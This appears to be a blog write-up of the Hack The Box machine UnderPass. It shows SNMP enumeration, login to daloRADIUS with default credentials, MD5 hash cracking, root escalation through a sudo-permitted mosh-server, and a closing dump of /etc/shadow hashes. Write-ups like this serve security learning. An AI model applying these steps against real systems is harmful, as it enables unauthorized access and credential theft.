Zumpyx Blog

UnderPass

Machines#641EasyLinux

Tags: Apache2、SNMP、Daloradius、Hashcat、Mosh

Recon & Enum

nmap -p- --min-rate 1000 -T4 -sC -sV -O -v underpass.htb
---
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
20/udp    closed ftp-data
111/udp   closed rpcbind
161/udp   open   snmp        SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: c7ad5c4856d1cf6600000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 2h47m59s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_  System uptime: 2h47m59.34s (1007934 timeticks)
...
gobuster dir -k --random-agent -w directories.txt -u 'http://underpass.htb/'
/.htpasswd            (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10671]
---
snmpwalk -c public -v 2c $IP
---
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (2252756) 6:15:27.56
iso.3.6.1.2.1.1.4.0 = STRING: "[email protected]"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
...

Shell as svcMosh

image.png

![image.png](./assets/0641-underpass/image 1.png)

Web 主页是 Apache2/2.4.52 的默认主页,目录扫描得到的都是 403 响应,VHost 也没有扫到其他子域。

https://httpd.apache.org/security/vulnerabilities_24.html

![image.png](./assets/0641-underpass/image 2.png)

搜索 Apache2/2.4.52 漏洞发现 CVE-2024-38472

https://github.com/mrmtwoj/apache-vulnerability-testing

nuclei -duc -target http://underpass.htb
---
[waf-detect:apachegeneric] [http] [info] http://underpass.htb
[ssh-password-auth] [javascript] [info] underpass.htb:22
[ssh-sha1-hmac-algo] [javascript] [info] underpass.htb:22
[ssh-server-enumeration] [javascript] [info] underpass.htb:22 ["SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10"]
[openssh-detect] [tcp] [info] underpass.htb:22 ["SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10"]
[apache-detect] [http] [info] http://underpass.htb ["Apache/2.4.52 (Ubuntu)"]
[default-apache-test-all] [http] [info] http://underpass.htb ["Apache/2.4.52 (Ubuntu)"]
[default-apache2-ubuntu-page] [http] [info] http://underpass.htb
[options-method] [http] [info] http://underpass.htb ["POST,OPTIONS,HEAD,GET"]
[http-missing-security-headers:strict-transport-security] [http] [info] http://underpass.htb
[http-missing-security-headers:permissions-policy] [http] [info] http://underpass.htb
[http-missing-security-headers:x-content-type-options] [http] [info] http://underpass.htb
[http-missing-security-headers:referrer-policy] [http] [info] http://underpass.htb
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://underpass.htb
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://underpass.htb
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://underpass.htb
[http-missing-security-headers:content-security-policy] [http] [info] http://underpass.htb
[http-missing-security-headers:x-frame-options] [http] [info] http://underpass.htb
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://underpass.htb
[http-missing-security-headers:clear-site-data] [http] [info] http://underpass.htb
[caa-fingerprint] [dns] [info] underpass.htb

nuclei 是更新了这个 POC 的,但是没有扫到,根据 SNMP 的信息获得的只是一个 daloradius 服务,尝试子域名和子路径。

![image.png](./assets/0641-underpass/image 3.png)

![image.png](./assets/0641-underpass/image 4.png)

访问 http://underpass.htb/daloradius 时,会变成 http://underpass.htb/daloradius/ 说明这个子目录是存在的。

gobuster dir -k --random-agent -w directories.txt -u 'http://underpass.htb/daloradius/'
---
...
/app                  (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/app/]
/library              (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/library/]
/doc                  (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/doc/]
/contrib              (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/contrib/]
/setup                (Status: 301) [Size: 325] [--> http://underpass.htb/daloradius/setup/]
...

![image.png](./assets/0641-underpass/image 5.png)

administrator / radius

![image.png](./assets/0641-underpass/image 6.png)

https://github.com/lirantal/daloradius/issues/456

搜索发现这个服务会有第一次无法登录,需要通过操作员路径来修改 /app/operators/login.php

![image.png](./assets/0641-underpass/image 7.png)

![image.png](./assets/0641-underpass/image 8.png)

原密码可以登录,在设置里面能看到一个凭据 steve / testing123,不过无法登录 SSH

![image.png](./assets/0641-underpass/image 9.png)

在管理界面也发现了另一个用户以及其 Hash,使用 Hashcat 爆破 md5 得到 svcMosh / underwaterfriends

![image.png](./assets/0641-underpass/image 10.png)

Local Enum

sudo -l
---
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

Shell as Root

Local Enum

...
user2 (nopasswd)
...

Shell as Root

https://github.com/mobile-shell/mosh

Mosh 是一个远程 shell,使用 mosh-server 时会显示服务端口以及连接所需的 Key

sudo /usr/bin/mosh-server
---
MOSH CONNECT 60001 dhyh1azR+T0F61fOmYLO8A

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <[email protected]u>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 1613]

mosh-client 127.0.0.1 60001
---
MOSH_KEY environment variable not found.

sudo /usr/bin/mosh-server
---
MOSH CONNECT 60002 nOHTpN/5OkPk3lAaKvoRig

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <[email protected]u>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 1623]

export MOSH_KEY="nOHTpN/5OkPk3lAaKvoRig"
mosh-client 127.0.0.1 60002

![image.png](./assets/0641-underpass/image 11.png)

More and More

这个靶机难点在于开局是否记得 UDP Scan

Dump Hash

root:$y$j9T$y6GVl9yuguP9lhnKmS04c.$pzmkCXRNa/BCrMpnOUxIWUbVR905YSEHwW20O40wEaA:20057:0:99999:7:::
daemon:*:19103:0:99999:7:::
bin:*:19103:0:99999:7:::
sys:*:19103:0:99999:7:::
sync:*:19103:0:99999:7:::
games:*:19103:0:99999:7:::
man:*:19103:0:99999:7:::
lp:*:19103:0:99999:7:::
mail:*:19103:0:99999:7:::
news:*:19103:0:99999:7:::
uucp:*:19103:0:99999:7:::
proxy:*:19103:0:99999:7:::
www-data:*:19103:0:99999:7:::
backup:*:19103:0:99999:7:::
list:*:19103:0:99999:7:::
irc:*:19103:0:99999:7:::
gnats:*:19103:0:99999:7:::
nobody:*:19103:0:99999:7:::
_apt:*:19103:0:99999:7:::
systemd-network:*:19103:0:99999:7:::
systemd-resolve:*:19103:0:99999:7:::
messagebus:*:19103:0:99999:7:::
systemd-timesync:*:19103:0:99999:7:::
pollinate:*:19103:0:99999:7:::
sshd:*:19103:0:99999:7:::
syslog:*:19103:0:99999:7:::
uuidd:*:19103:0:99999:7:::
tcpdump:*:19103:0:99999:7:::
tss:*:19103:0:99999:7:::
landscape:*:19103:0:99999:7:::
usbmux:*:19949:0:99999:7:::
lxd:!:19949::::::
fwupd-refresh:*:19959:0:99999:7:::
freerad:*:19963:0:99999:7:::
mysql:!:19964:0:99999:7:::
Debian-snmp:!:19964:0:99999:7:::
tftp:*:19970:0:99999:7:::
svcMosh:$y$j9T$cK5jfCW.c6g5yvOzPF5iF1$E0geEsKPdNSCLj2wVbvftMGkbs.uJL7B0ADA41Q8Y08:20067:0:99999:7:::
_laurel:!:20068::::::